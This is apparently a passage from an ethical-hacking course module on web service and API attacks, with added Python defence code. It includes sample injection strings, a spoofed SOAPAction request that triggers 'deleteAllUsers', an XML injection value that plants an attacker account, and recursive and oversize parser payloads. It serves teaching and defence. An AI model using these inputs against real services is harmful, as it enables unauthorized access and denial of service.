Inject XML data and tags into user input fields to manipulate XML schema or populate XML database with
bogus entries

XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks

[Figure: an Account Login form (Username, Password, E-mail) beside the server-side XML user store holding <user> records for gandalf and Mark; the E-mail field value closes the current <mail> and <user> elements and opens a complete new <user> record (username jason, password attack, userid 105), which creates a new user account on the server]



Web Services Parsing Attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser
to create a denial-of-service attack or generate logical errors in web service request processing

■ Recursive Payloads: Attacker queries web services with a grammatically correct SOAP document that contains infinite
processing loops resulting in exhaustion of the XML parser and CPU resources
■ Oversize Payloads: Attackers send an excessively large payload to consume all system resources, rendering web
services inaccessible to other legitimate users

Web Service Attack Tools

■ SoapUI: SoapUI is a web service testing tool that supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF,
and JDBC. An attacker can use this tool to carry out web service probing, SOAP injection, XML injection, and web
service parsing attacks
■ XMLSpy: Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and
debugging XML-related technologies

[Screenshot: SoapUI]

Attack Web Services


Web applications often use web services to implement particular functionality. If the web services
integrated within a web application are vulnerable, the application itself becomes vulnerable, and
attackers can exploit it through the integrated web services. Attackers therefore readily target web
services, and compromised web services are a serious security threat.


Web services work atop legacy web applications, and any attack on a web service will
immediately expose an underlying application's business and logic vulnerabilities to various
attacks. Attackers can target web services using various techniques, because web applications
make these services available to users through different mechanisms, which increases the
likelihood of vulnerabilities. Attackers exploit these vulnerabilities to compromise web services.
There are many reasons why attackers target web services, and they choose an attack
depending on its purpose. If attackers merely want to stop a web service from serving its
intended users, they can launch a DoS attack by sending numerous requests.

[Figure: the attacker reaches the web service client and, through it, the package application, custom application, database system, database, and identity and application management servers; the attack classes shown are web services attacks (SOAP injection, XML injection), WSDL probing, information leakage, application logic attacks, database attacks, and DoS attacks]

Figure 14.80: Web service attack

Web Services Probing Attacks


WSDL files are automated documents consisting of sensitive information about service ports,
connections formed between two electronic machines, and so on. Attackers can use WSDL
probing attacks to obtain information about the vulnerabilities in public and private web
services, as well as to perform an SQL attack.
A web service probing attack involves the following steps:
■ In the first step, trap the WSDL document from web service traffic and analyze it to
determine the purpose of the application, functional breakdown, entry points, and
message types
■ Create a set of valid requests by selecting a set of operations and formulating the
request messages according to the rules of the XML schema that can be submitted to
the web service
■ Use these requests to include malicious contents in SOAP requests and analyze errors to
gain a deeper understanding of potential security weaknesses


[Figure: the attacker injects an arbitrary character (') into the name field of a GetProductInformationByName SOAP request; the server throws an error, returning a SOAP fault with faultcode soap:Server and a faultstring beginning System.Web.Services.Protocols.SoapException]

Figure 14.81: Web Services Probing attack

Web Service Attacks: SOAP Injection

SOAP is a lightweight and simple XML-based protocol designed to exchange structured and typed
information on the web. The XML Envelope element is always the root element of a SOAP
message in the XML schema. SOAP injection uses special characters such as single quotes,
double quotes, semicolons, and so on.
The attacker injects malicious query strings in the user input field to bypass web service
authentication mechanisms and access backend databases. This attack works similarly to SQL
injection attacks.

[Figure: an Account Login form submitted with Username "%" and Password "' or 1=1 or blah='"; the values are sent in a GetProductInformationByName SOAP request, and the Server Response is a GetProductInformationByNameResponse message returning productid 25, productName Painting101, productQuantity 3, and productPrice 1500]

Figure 14.82: Web Services SOAP Injection attack

Web Service Attacks: SOAPAction Spoofing

Every SOAP request message contains an operation that is executed by the application and is
included as the first child element in the SOAP body. When SOAP messages are transmitted
using HTTP, an additional HTTP header known as SOAPAction is used. The operation to be
executed is included in the SOAPAction header. The header element informs the receiving web
service about the operation present in the SOAP body without the need to perform XML
parsing. Attackers can exploit this optimization to manipulate the operations included in the
SOAPAction headers.
For example, consider a web service that includes two operations, createUser and
deleteAllUsers, and is vulnerable to such an attack. Assume that this web service is protected
by a gateway and only authorized users who have direct communication with the web service
can perform the deleteAllUsers operation. An attacker in front of the gateway can perform a
SOAPAction spoofing attack by manipulating the SOAPAction header as follows:
An HTTP request message for creating a user:
POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "createUser"

<Envelope>
  <Header/>
  <Body>
    <createUser>
      <login>rinnimathews</login>
      <pwd>password</pwd>
    </createUser>
  </Body>
</Envelope>
The attacker can modify the SOAPAction to "deleteAllUsers", and the gateway passes this
message because the SOAP body consists of the createUser operation.
POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "deleteAllUsers"

<Envelope>
  <Header/>
  <Body>
    <createUser>
      <login>rinnimathews</login>
      <pwd>password</pwd>
    </createUser>
  </Body>
</Envelope>
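A server-side check that closes this gap, as an added example rather than code from the original text: the operation is read from the first child of the SOAP Body, a SOAPAction header naming anything else is rejected, and authorization is decided on the body operation. The two messages above are embedded as constructed samples; the per-caller allow-list policy is an assumption.

```python
"""Consistency check against SOAPAction spoofing. Added example, not from the
original text: the operation that will actually execute is the first child of
the SOAP Body, so a request whose SOAPAction header disagrees with it is
rejected, and the allow-list is applied to the body operation, never to the
header alone.
"""
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip an XML namespace prefix such as '{http://...}Body'."""
    return tag.rsplit("}", 1)[-1]


def parse_http_message(raw: str) -> tuple:
    """Split a raw HTTP request (constructed text) into a header dict and body."""
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.splitlines()[1:]:            # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body.strip()


def body_operation(soap_xml: str) -> str:
    """The operation the service will run: first child element of the Body."""
    root = ET.fromstring(soap_xml)
    body = next((c for c in root if _local(c.tag) == "Body"), None)
    if body is None or len(body) == 0:
        raise ValueError("SOAP Body missing or empty")
    return _local(body[0].tag)


def header_operation(headers: dict) -> str:
    """Operation claimed by SOAPAction; may be a bare name or a URI."""
    action = headers.get("soapaction", "").strip().strip('"')
    return action.rsplit("/", 1)[-1]


def check_request(raw: str, allowed_ops: set) -> tuple:
    """Return (accepted, reason). Assumed policy: header and body must agree,
    and the body operation must be in this caller's allow-list."""
    headers, body = parse_http_message(raw)
    claimed, actual = header_operation(headers), body_operation(body)
    if claimed != actual:
        return False, f"SOAPAction '{claimed}' does not match body operation '{actual}'"
    if actual not in allowed_ops:
        return False, f"operation '{actual}' is not permitted for this caller"
    return True, actual


# The two messages from the text, reproduced as constructed samples.
LEGITIMATE = """POST /service HTTP/1.1
Host: certifiedHacker
SOAPAction: "createUser"

<Envelope>
  <Header/>
  <Body>
    <createUser>
      <login>rinnimathews</login>
      <pwd>password</pwd>
    </createUser>
  </Body>
</Envelope>"""

SPOOFED = LEGITIMATE.replace('SOAPAction: "createUser"', 'SOAPAction: "deleteAllUsers"')

if __name__ == "__main__":
    for raw in (LEGITIMATE, SPOOFED):
        print(check_request(raw, allowed_ops={"createUser"}))
```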
Attackers use tools such as WS-Attacker to perform SOAPAction spoofing:
■ WS-Attacker

Source: https://github.com
WS-Attacker is a tool for performing automatic penetration tests of web services. It is an
open-source and easy-to-use software solution with multiple plugins for different attack
types, and it provides a security checking interface. WS-Attacker provides functionality
to load WSDL files and send SOAP messages to the web service endpoints, and it can test
whether a web service is vulnerable to attacks such as XML signature wrapping, SOAPAction
spoofing, and DoS.

[Screenshot: WS-Attacker Attack Overview and Log tabs. The SOAPAction Spoofing plugin scores 3/3 points ("The server executes the Operation specified by the SOAPAction Header. This can be abused to execute unauthorized operations, if authentication is controlled by the SOAP message"); the WS-Addressing Spoofing plugin tries the 'ReplyTo', 'To' and 'FaultTo' methods with WSA versions 200508 and 200408, and all three attempts fail (Plugin finished: 0/3)]

Figure 14.83: Screenshot of WS-Attacker

Web Service Attacks: WS-Address Spoofing

WS-Address provides additional routing information in the SOAP header to support
asynchronous communication. This technique allows the transmission of web service requests
and response messages using different TCP connections. It is essential for long-running service
requests where the calculation time of the server-side application exceeds the lifetime of a
single TCP connection.
WS-Address includes an optional FaultTo address element for stating an alternative endpoint
that is to be used in case of any complications. As the requester selects the endpoint address
used in the ReplyTo and FaultTo headers, it is not secured properly against tampering by
intermediaries. Although the specification asks to perform digital signatures on these header
fields, the values mostly depend on the default setting without any proper security.
This causes a vulnerability that can be exploited by the attacker to perform the WS-Address
spoofing attack. In the WS-Address spoofing attack, an attacker sends a SOAP message
containing fake WS-Address information to the server. The <ReplyTo> header consists of the
address of the endpoint selected by the attacker instead of the web service client. The endpoint
selected by the attacker receives unnecessary traffic via SOAP messages. Furthermore, the
attacker may generate a massive amount of traffic, thus resulting in a DoS attack. Attackers use
tools such as WS-Attacker to identify and exploit WS-Addressing spoofing vulnerabilities.
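One way to validate the callback headers before a request is processed, as an added example not taken from the original text: a ReplyTo, FaultTo or From address must be either the WS-Addressing anonymous address (reply on the same connection) or a host the service registered in advance. The sample messages, the registered host and the third-party endpoint are constructed.

```python
"""Validation of WS-Addressing callback endpoints. Added example, not from the
original text: the server refuses to act as a traffic source toward any
endpoint the sender chose unless that endpoint was registered beforehand.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Anonymous addresses of WS-Addressing 1.0 (2005/08) and the 2004/08 submission.
ANONYMOUS = {
    "http://www.w3.org/2005/08/addressing/anonymous",
    "http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous",
}
CALLBACK_HEADERS = ("ReplyTo", "FaultTo", "From")


def _local(tag: str) -> str:
    """Strip an XML namespace prefix such as '{http://...}Header'."""
    return tag.rsplit("}", 1)[-1]


def callback_endpoints(soap_xml: str) -> dict:
    """Map each callback header present in the SOAP Header to its <Address>."""
    root = ET.fromstring(soap_xml)
    header = next((c for c in root if _local(c.tag) == "Header"), None)
    found = {}
    if header is None:
        return found
    for child in header:
        name = _local(child.tag)
        if name in CALLBACK_HEADERS:
            addr = next((e for e in child.iter() if _local(e.tag) == "Address"), None)
            found[name] = (addr.text or "").strip() if addr is not None else ""
    return found


def validate_addressing(soap_xml: str, registered_hosts: set) -> tuple:
    """Return (accepted, problems). Assumed policy: anonymous is always fine;
    any other address must be an http(s) URL whose host was registered."""
    problems = []
    for name, addr in callback_endpoints(soap_xml).items():
        if addr in ANONYMOUS:
            continue
        url = urlparse(addr)
        if url.scheme not in ("http", "https") or not url.hostname:
            problems.append(f"{name}: address {addr!r} is not an http(s) URL")
        elif url.hostname not in registered_hosts:
            problems.append(f"{name}: host {url.hostname!r} is not a registered callback endpoint")
    return not problems, problems


def _message(reply_to: str, fault_to: str = None) -> str:
    """Constructed SOAP 1.1 request carrying WS-Addressing 1.0 headers."""
    fault = f"<wsa:FaultTo><wsa:Address>{fault_to}</wsa:Address></wsa:FaultTo>" if fault_to else ""
    return f"""<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:wsa="http://www.w3.org/2005/08/addressing">
  <soap:Header>
    <wsa:ReplyTo><wsa:Address>{reply_to}</wsa:Address></wsa:ReplyTo>{fault}
  </soap:Header>
  <soap:Body><GetProductInformationByName/></soap:Body>
</soap:Envelope>"""


# Constructed samples: the figure's client as the registered host, the anonymous
# form, and a message whose ReplyTo/FaultTo point at an unregistered third party.
REGISTERED = {"client"}
LEGITIMATE = _message("http://client")
SAME_CONNECTION = _message("http://www.w3.org/2005/08/addressing/anonymous")
SPOOFED = _message("http://thirdparty.example", fault_to="http://thirdparty.example/fault")

if __name__ == "__main__":
    for msg in (LEGITIMATE, SAME_CONNECTION, SPOOFED):
        print(validate_addressing(msg, REGISTERED))
```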

[Figure: on the left, regular SOAP traffic between the web service client and server, where the SOAP Header carries <ReplyTo><Address>http://client</Address></ReplyTo>; on the right, un-requested SOAP traffic received by the web service client after the attacker sends the server a message whose ReplyTo address names the client]

Figure 14.84: Illustration of WS-Address spoofing attack

Web Service Attacks: XML Injection

Web applications sometimes use XML to store data such as user credentials in XML documents;
attackers can parse and view such data using XPath. XPath defines the flow of the document
and verifies user credentials, such as the username and password, to redirect them to a specific
user account.
Attackers identify the XPath and insert an XML injection or XML schema to bypass the
authentication process and gain unrestricted access to the data stored in XML. Supplying input
values that the XML query processes without validation is an XML injection attack.
Attackers inject XML data and tags into user input fields to manipulate XML schema or populate
XML databases with bogus entries. XML injection can be used to bypass authorization, escalate
privileges, and generate web services DoS attacks.
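The record-creation flaw behind this attack, shown as an added example (not code from the original text): a string-templated writer beside one that goes through the XML API, and a reader that reports what each store contains afterwards. The store layout follows the figure; the e-mail addresses and the Mark/jason records are constructed.

```python
"""XML injection into an XML-backed user store: vulnerable string templating
beside the escaped form. Added example, not from the original text; the
store layout follows the figure, the e-mail addresses are constructed.
"""
import xml.etree.ElementTree as ET

STORE = """<users>
  <user><username>gandalf</username><password>!c3</password><userid>101</userid><mail>gandalf@example.com</mail></user>
</users>"""


def add_user_unsafe(store_xml: str, username: str, password: str, userid: int, mail: str) -> str:
    """Vulnerable: field values are dropped into the markup verbatim."""
    record = (f"  <user><username>{username}</username><password>{password}</password>"
              f"<userid>{userid}</userid><mail>{mail}</mail></user>\n")
    return store_xml.replace("</users>", record + "</users>")


def add_user_safe(store_xml: str, username: str, password: str, userid: int, mail: str) -> str:
    """Hardened: build the record through the XML API, so '<', '>' and '&' in a
    value are serialized as character data instead of being parsed as markup."""
    root = ET.fromstring(store_xml)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", str(userid)), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="unicode")


def usernames(store_xml: str) -> list:
    """What the application sees when it reads the store back."""
    return [u.findtext("username") for u in ET.fromstring(store_xml).findall("user")]


def mail_of(store_xml: str, username: str):
    """The stored mail value of one account, or None if the account is absent."""
    for u in ET.fromstring(store_xml).findall("user"):
        if u.findtext("username") == username:
            return u.findtext("mail")
    return None


# Constructed payload for the E-mail field, following the figure: it closes the
# current <mail> and <user> elements and opens a second, attacker-chosen record.
MAIL_PAYLOAD = ("mark@example.com</mail></user>"
                "<user><username>jason</username><password>attack</password>"
                "<userid>105</userid><mail>jason@example.com")

if __name__ == "__main__":
    print(usernames(add_user_unsafe(STORE, "Mark", "12345", 102, MAIL_PAYLOAD)))  # ['gandalf', 'Mark', 'jason']
    print(usernames(add_user_safe(STORE, "Mark", "12345", 102, MAIL_PAYLOAD)))    # ['gandalf', 'Mark']
```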

[Figure: the server-side XML user store at http://www.certifiedhacker.com/wsflogin.asmx holds <user> records (username, password, userid, mail) for gandalf and Mark; the Account Login form's E-mail field is filled with a value that closes the current <mail> and <user> elements and opens a complete new <user> record (username jason, password attack, userid 105), which creates a new user account on the server]

Figure 14.85: Web Services XML Injection attack


Web Services Parsing Attacks


Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML
parser to create a DoS attack or generate logical errors in web service request processing. A
parsing attack is performed when an attacker succeeds in modifying a file request or string. The
attacker changes the values by superimposing one or more operating system commands via the
request. Parsing is possible when the attacker executes .bat (batch) or .cmd (command) files.
■ Recursive Payloads
The attacker queries for web services with a grammatically correct SOAP document that
contains infinite processing loops, resulting in exhaustion of the XML parser and CPU
resources.
■ Oversize Payloads
Attackers send a payload that is excessively large to consume all the system resources,
rendering web services inaccessible to other legitimate users.
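An added defensive check (not from the module) for the two payload shapes just described: it streams a SOAP request through the parser counting nesting depth and element count, and refuses the request before the service logic sees it if the byte cap or a structural limit is crossed. The limits, envelope, and sample requests are constructed.

```python
"""Added example: pre-parse limits against recursive and oversize XML payloads."""
import io
import xml.etree.ElementTree as ET

MAX_BYTES = 64 * 1024     # oversize payload guard (constructed limit)
MAX_DEPTH = 32            # recursive payload guard (constructed limit)
MAX_ELEMENTS = 10_000     # also caps very wide, flat documents


class PayloadRejected(ValueError):
    """Raised when a request exceeds one of the structural limits."""


def check_soap_payload(raw: bytes, max_bytes: int = MAX_BYTES,
                       max_depth: int = MAX_DEPTH,
                       max_elements: int = MAX_ELEMENTS) -> dict:
    """Stream through the document counting depth and element count.

    Returns a small summary on success; raises PayloadRejected as soon as a
    limit is crossed, so a hostile document is never fully expanded."""
    if len(raw) > max_bytes:
        raise PayloadRejected(f"payload of {len(raw)} bytes exceeds {max_bytes}")
    depth = max_depth_seen = elements = 0
    try:
        for event, elem in ET.iterparse(io.BytesIO(raw), events=("start", "end")):
            if event == "start":
                depth += 1
                elements += 1
                max_depth_seen = max(max_depth_seen, depth)
                if depth > max_depth:
                    raise PayloadRejected(f"nesting depth exceeds {max_depth}")
                if elements > max_elements:
                    raise PayloadRejected(f"element count exceeds {max_elements}")
            else:
                depth -= 1
                elem.clear()  # free memory as we go; only the counts are needed
    except ET.ParseError as exc:
        raise PayloadRejected(f"malformed XML: {exc}") from exc
    return {"bytes": len(raw), "max_depth": max_depth_seen, "elements": elements}


def is_rejected(raw: bytes) -> bool:
    """Convenience wrapper: True when the payload would be refused."""
    try:
        check_soap_payload(raw)
    except PayloadRejected:
        return True
    return False


def soap_envelope(body_xml: str) -> bytes:
    """Wrap a body fragment in a minimal SOAP 1.1 envelope (constructed)."""
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
        f"<soapenv:Body>{body_xml}</soapenv:Body></soapenv:Envelope>"
    ).encode()


# Constructed sample requests.
NORMAL_REQUEST = soap_envelope(
    "<ItemSearch><Keywords>soapui</Keywords><SearchIndex>All</SearchIndex></ItemSearch>"
)
# Recursive payload: grammatically correct, but nested far beyond any real request.
RECURSIVE_REQUEST = soap_envelope("<a>" * 5000 + "</a>" * 5000)
# Oversize payload: a single element carrying a huge text node.
OVERSIZE_REQUEST = soap_envelope("<Keywords>" + "A" * (2 * MAX_BYTES) + "</Keywords>")

if __name__ == "__main__":
    print(check_soap_payload(NORMAL_REQUEST))
    for name, req in (("recursive", RECURSIVE_REQUEST), ("oversize", OVERSIZE_REQUEST)):
        print(name, "rejected" if is_rejected(req) else "accepted")
```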
Web Service Attack Tools
■ SoapUI
Source: https://www.soapui.org
SoapUI is a web service testing tool that supports multiple protocols such as SOAP,
REST, HTTP, JMS, AMF, and JDBC. An attacker can use this tool to carry out web service
probing, SOAP injection, XML injection, and web service parsing attacks.

[Screenshot: SoapUI Pro with the Sample Amazon Project open, showing an ItemSearch SOAP
request to webservices.amazon.com, its request properties, and the response time]
Figure 14.86: Screenshot of SoapUI Pro


■ XMLSpy
Source: https://www.altova.com
Altova XMLSpy is an XML editor and development environment for modeling, editing,
transforming, and debugging XML-related technologies.

[Screenshot: XMLSpy editing ExpReport.xsl, with the XML/XSL info pane, element and attribute
lists, and entity list visible]
Figure 14.87: Screenshot of XM LSpy



Additional Web Application Hacking Tools


Besides the web application hacking tools described above, several other tools can help
attackers accomplish their goals.
Some additional web application hacking tools are listed below:
■ Metasploit (https://www.metasploit.com)
■ w3af (https://w3af.org)
■ Nikto (https://cirt.net)
■ Sn1per (https://github.com)
■ WSSiP (https://github.com)
■ X Attacker (https://github.com)
■ timing_attack (https://github.com)
■ HTTrack (https://www.httrack.com)
■ SQL Injection Scanner (https://pentest-tools.com)
■ XSS Scanner (https://pentest-tools.com)
■ SQLi Exploiter (https://pentest-tools.com)
■ HTTP Request Logger (https://pentest-tools.com)
■ WebCopier (https://www.maximumsoft.com)
■ WPScan (https://wpscan.com)
■ TIDoS-Framework (https://github.com)


LO#04: Explain Web API, Webhooks, and Web Shell

Web API, Webhooks, and Web Shell


Recent years have witnessed an exponential increase in the usage of web APIs in application
development. Web APIs help developers build web applications that retrieve data from
multiple online sources. As web APIs are incorporated in many popular applications such as
social networking, shopping, and search engines, the importance of securing APIs and their
integrity has increased. Any security breach in an API can expose personal or business-critical
data to attackers. This section discusses the basic concepts of web API, webhooks, and web
shell; API vulnerabilities and hacking techniques; and the best practices for API security.



What is Web API?


Web API is an application programming interface that provides online web services to client-
side applications for retrieving and updating data from multiple online sources. It is a special
type of interface where interactions between applications can be allowed through the Internet
and some web-based protocols. Web APIs make resources accessible on the Internet, and they
are generally accessed via the HTTP protocol. They also consist of different types of tools,
functions, and protocols that can be used to develop software or applications without any
complexity.
For example, consider a traditional web application that is supported by multiple mobile
platforms with no centralized API. This results in the complexity of updating business logic for
each individual implementation whenever there is an update in the client applications. Using a
centralized web API reduces the complexity and increases the integrity of updating and
changing the data or business logic at one central location.


[Figure: mobile apps, web apps, and other apps reach the Image, Barcode, Custom, Report, PDF,
Excel, Database, File, and Other services through REST web APIs]
Figure 14.88: Illustration of Web API



Web Service APIs


The most frequently used web service APIs are listed below:
■ SOAP API: SOAP is a web-based communication protocol that enables interactions
between applications running on different platforms such as Windows, macOS, Linux,
etc., via XML and HTTP. SOAP-based APIs are programmed to generate, recover, modify,
and erase different logs such as profiles, credentials, and business leads.
■ REST (Representational State Transfer) API: REST is not a specification, tool, or
framework; it is an architectural style of web service that serves as a communication
medium between various systems on the web. APIs supported by the REST architectural
style are known as REST APIs. Such API-based computer systems, web services, and
database systems allow requesting machines to receive prompt access and redefine
web resource representations by providing a set of stateless protocols and qualitative
operations.
■ RESTful API: RESTful API is a RESTful service that is designed using REST principles and
HTTP communication protocols. RESTful is a collection of resources that use HTTP
methods such as PUT, POST, GET, and DELETE. RESTful API is also designed to make
applications independent to improve the overall performance, visibility, scalability,
reliability, and portability of an application.
APIs with the following features can be referred to as RESTful APIs:
o Stateless: The client end stores the state of the session; the server is restricted from
saving data during the request processing
o Cacheable: The client should save responses (representations) in the cache. This
feature can enhance API performance


o Client-server Environment: Both the client and the server should be independent of
each other because the server handles backend operations and the client is the front
end from where requests are made
o Uniform Interface: Resources must be specifically and independently recognized via
a single URL by employing basic protocol methods such as PUT, POST, GET, and
DELETE, and it should be possible to modify a resource
o Layered System: Multiple-layer architecture allows intermediary servers to supply
shared memory (cache) to achieve scalability because the client system never
directly notifies the main server of its connectivity
o Code on Demand: An optional feature where the server can also provide temporary
executable code to the client, through which the client's functionality can be
customized
■ XML-RPC: Extensible Markup Language - Remote Procedure Call (XML-RPC) is a
communication protocol that uses a specific XML format to transfer data, whereas SOAP
uses proprietary XML to transfer data. It is simpler than SOAP and uses less bandwidth
to transfer data.
■ JSON-RPC: JavaScript Object Notation - Remote Procedure Call (JSON-RPC) is a
communication protocol that serves in the same way as XML-RPC but uses the JSON
format instead of XML to transfer data.



What are Webhooks?


Webhooks are user-defined HTTP callback or push APIs that are raised based on triggered
events, such as a comment received on a post or code pushed to a registry. A webhook
allows an application to update other applications with the latest information. Once invoked, it
supplies data to the other applications, which means that users instantly receive real-time
information. Webhooks are sometimes called "Reverse APIs" as they provide what is required
for an API specification, and the developer should create an API to use a webhook.
A webhook is an API concept that is also used to send text messages and notifications to mobile
numbers or email addresses from an application when a specific event is triggered. For
instance, if you search for something in an online store and the required item is out of stock,
you click the "Notify me" button to get an alert from the application when that item is available
for purchase. These notifications from the applications are usually sent through webhooks.
Operation of Webhooks

Webhooks are enrolled along with the domain registration via the user interface or API to
inform the clients about a new event occurrence. The generated path contains the required
code that automatically executes on the new event occurrence. Here, systems need not know
what should be run; they just need to trace the path to generate notifications.
A webhook is a powerful tool because everything remains isolated on the web. As shown in the
figure below, when system-2 gets a notification message from the selected path of the domain,
it not only becomes aware of new event occurrences on other machines but also responds to
them. The path contains the code that can be accessed via an HTTP POST request. It also
informs the user about where the message has been triggered from, including its date and time
and other details related to the event. Webhooks can be private or public.


[Figure: System-1 raises Event 1, Event 2, and Event 3; each is delivered to System-2 as an
HTTP POST request over the web]
Figure 14.89: Operation of webhooks

Webhooks vs. APIs

■ Webhooks are automated messages from websites to the server. APIs are used for
server-to-website communication.
■ Webhooks get reports or notifications via HTTP POST only when a new update is made.
APIs make calls irrespective of the data updates.
■ Webhooks update applications or services with real-time information. An API needs
additional implementation to perform this activity.
■ Webhooks have less control over data flow. APIs have easy control over data flow.
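The System-1 to System-2 exchange of Figure 14.89 in code, as an added example (not from the module): System-1 builds the HTTP POST it sends to the registered path when an event fires, and System-2 validates and parses it. The callback path, shared secret, sample event, and the timestamp-plus-HMAC signature header that lets the receiver reject altered or replayed deliveries are constructed for this example; the page itself does not describe signing.

```python
"""Added example: a webhook delivery and its receiving-side checks."""
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

WEBHOOK_PATH = "/hooks/events"              # constructed: path registered by System-2
SHARED_SECRET = b"constructed-demo-secret"   # constructed: agreed at registration time
SAMPLE_EVENT = {"event": "push", "id": 42, "ref": "refs/heads/main", "source": "system-1"}


def _signature(secret: bytes, sent_at: int, body: bytes) -> str:
    mac = hmac.new(secret, f"{sent_at}.".encode() + body, hashlib.sha256).hexdigest()
    return f"sha256={mac}"


def build_webhook_post(event: dict, secret: bytes = SHARED_SECRET,
                       sent_at: Optional[int] = None) -> Tuple[dict, bytes]:
    """System-1: serialise the event into the POST body and sign body plus timestamp."""
    sent_at = int(time.time()) if sent_at is None else sent_at
    body = json.dumps(event, separators=(",", ":"), sort_keys=True).encode()
    headers = {
        "Content-Type": "application/json",
        "X-Webhook-Timestamp": str(sent_at),
        "X-Webhook-Signature": _signature(secret, sent_at, body),
    }
    return headers, body


def handle_webhook_post(path: str, headers: dict, body: bytes,
                        secret: bytes = SHARED_SECRET, now: Optional[int] = None,
                        max_age: int = 300) -> dict:
    """System-2: accept the POST only on the registered path, with a valid
    signature, and within max_age seconds of when it was sent."""
    if path != WEBHOOK_PATH:
        raise ValueError("unknown webhook path")
    try:
        sent_at = int(headers["X-Webhook-Timestamp"])
        sig = headers["X-Webhook-Signature"]
    except (KeyError, ValueError) as exc:
        raise ValueError("missing or malformed webhook headers") from exc
    if not hmac.compare_digest(sig, _signature(secret, sent_at, body)):
        raise ValueError("bad webhook signature")
    now = int(time.time()) if now is None else now
    if abs(now - sent_at) > max_age:
        raise ValueError("stale webhook delivery")   # limits replay of captured POSTs
    return json.loads(body)


def deliver(event: dict, tamper: bool = False, delay: int = 5,
            sent_at: int = 1_700_000_000) -> str:
    """Run one delivery end to end and report System-2's verdict."""
    headers, body = build_webhook_post(event, sent_at=sent_at)
    if tamper:  # simulate the body being altered between the two systems
        body = body.replace(b'"push"', b'"delete"')
    try:
        received = handle_webhook_post(WEBHOOK_PATH, headers, body, now=sent_at + delay)
    except ValueError as exc:
        return f"rejected: {exc}"
    return f"accepted: {received['event']} from {received['source']}"


if __name__ == "__main__":
    print(deliver(SAMPLE_EVENT))
    print(deliver(SAMPLE_EVENT, tamper=True))
    print(deliver(SAMPLE_EVENT, delay=1000))
```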



OWASP Top 10 API Security Risks


Source: https://owasp.org
According to OWASP, the following are the top 10 API security risks:

API1 Broken Object Level Authorization
■ APIs expose the endpoints handling object identifiers, and the server component does not
track the client's state properly, resulting in a massive attack surface level access control flaw
■ Allows the attacker to modify the object's ID value and obtain unauthorized access to the
data source
API2 Broken User Authentication
■ Vulnerabilities in authentication mechanisms allow attackers to capture authentication
tokens and steal user identities
■ Attackers can easily compromise the API security using authentication tokens and exploiting
implementation flaws
■ APIs are vulnerable to authentication attacks such as credential stuffing and brute-forcing
API3 Excessive Data Exposure
■ While designing the API, the developers may expose all the object properties to the clients
without considering their individual sensitivity and depend on the clients for filtering data
■ Allows attackers to retrieve more information than requested
API4 Lack of Resources and Rate Limiting
■ APIs avoid enforcing restrictions on the number of resources requested by the client
■ Allows attackers to consume all the available resources, resulting in service unavailability
to legitimate users, causing DoS
■ May include authentication flaws that can be exploited to perform brute-force attacks
API5 Broken Function Level Authorization
■ Complexity in access control policies through different hierarchies, groups, and roles
between administrative and regular functions can cause authorization errors
■ Allows attackers to gain unauthorized access to administrative functions or users' resources
API6 Mass Assignment
■ APIs accidentally expose the internal variables or objects due to improper binding and
filtering based on a whitelist
■ Allows attackers with unauthorized access to modify the object properties
API7 Security Misconfiguration
■ Security misconfigurations include vulnerabilities such as insecure default configurations,
ad-hoc configurations, open cloud storage, misconfigured HTTP headers, permissive
cross-origin resource sharing (CORS), and missing TLS/SSL
■ Allows attackers to perform various attacks and compromise the system security
API8 Injection
■ Sending untrusted data as queries to the interpreter may result in injection flaws, such as
SQL, LDAP, XML, and command injection
■ Allows attackers to trick the interpreter by sending data to execute malicious commands
and gain unauthorized access
API9 Improper Assets Management
■ Improper asset management occurs due to a lack of version control for API hierarchies, and
older versions of an API contain vulnerabilities that can be exploited by the attacker
API10 Insufficient Logging and Monitoring
■ Lack of proper logging and monitoring along with missing or ineffective integration with
incident response can make the system vulnerable
■ Allows attackers to compromise the system, maintain persistence, and pivot to other
systems and networks to extract, tamper with, or destroy data

Table 14.3: OWASP Top 10 API Security Risks
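API6 Mass Assignment and API3 Excessive Data Exposure from the table above, side by side with their allowlisted fixes, as an added example (not code from the module or from OWASP). The profile endpoint, the UserRecord fields, the allowlists, and the sample request are constructed for illustration.

```python
"""Added example: request binding and response projection against an allowlist."""
import json
from dataclasses import asdict, dataclass
from typing import List, Tuple


@dataclass
class UserRecord:
    id: int
    username: str
    email: str
    role: str = "user"             # changeable only through an admin flow
    password_hash: str = ""        # must never leave the server
    credit_balance: int = 0        # internal accounting field


# Constructed allowlists: what a client may set, and what a client may see.
CLIENT_WRITABLE = frozenset({"username", "email"})
CLIENT_VISIBLE = frozenset({"id", "username", "email", "role"})


def update_profile_unsafe(user: UserRecord, request_json: str) -> UserRecord:
    """API6 as it happens: every JSON key that matches an attribute is bound
    straight onto the object, so the client can set role or balance too."""
    for key, value in json.loads(request_json).items():
        if hasattr(user, key):
            setattr(user, key, value)
    return user


def update_profile_safe(user: UserRecord, request_json: str) -> Tuple[UserRecord, List[str]]:
    """Hardened: bind only allowlisted keys and report the rest, so an
    unexpected 'role' key can be logged as a probe rather than applied."""
    data = json.loads(request_json)
    rejected = sorted(k for k in data if k not in CLIENT_WRITABLE)
    for key in data:
        if key in CLIENT_WRITABLE:
            setattr(user, key, data[key])
    return user, rejected


def render_user_unsafe(user: UserRecord) -> str:
    """API3 as it happens: the full record is returned and the client is
    trusted to hide the sensitive fields."""
    return json.dumps(asdict(user), sort_keys=True)


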